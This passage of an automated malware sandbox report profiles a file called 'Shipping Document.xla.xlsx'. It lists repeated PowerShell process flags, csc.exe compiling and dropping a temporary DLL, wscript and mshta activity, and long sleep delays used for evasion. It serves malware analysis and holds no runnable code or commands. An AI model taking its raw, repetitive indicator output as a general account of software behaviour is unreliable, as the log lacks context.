      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: Shipping Document.xla.xlsxStream path 'Workbook' entropy: 7.9972533186 (max. 8.0)
      Source: 02B30000.0.drStream path 'Workbook' entropy: 7.99719019112 (max. 8.0)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1798Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6295Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1335Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1792Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 375Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2415Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5671Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dllJump to dropped file
      Source: C:\Windows\System32\mshta.exe TID: 3668Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -240000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep count: 1335 > 30Jump to behavior
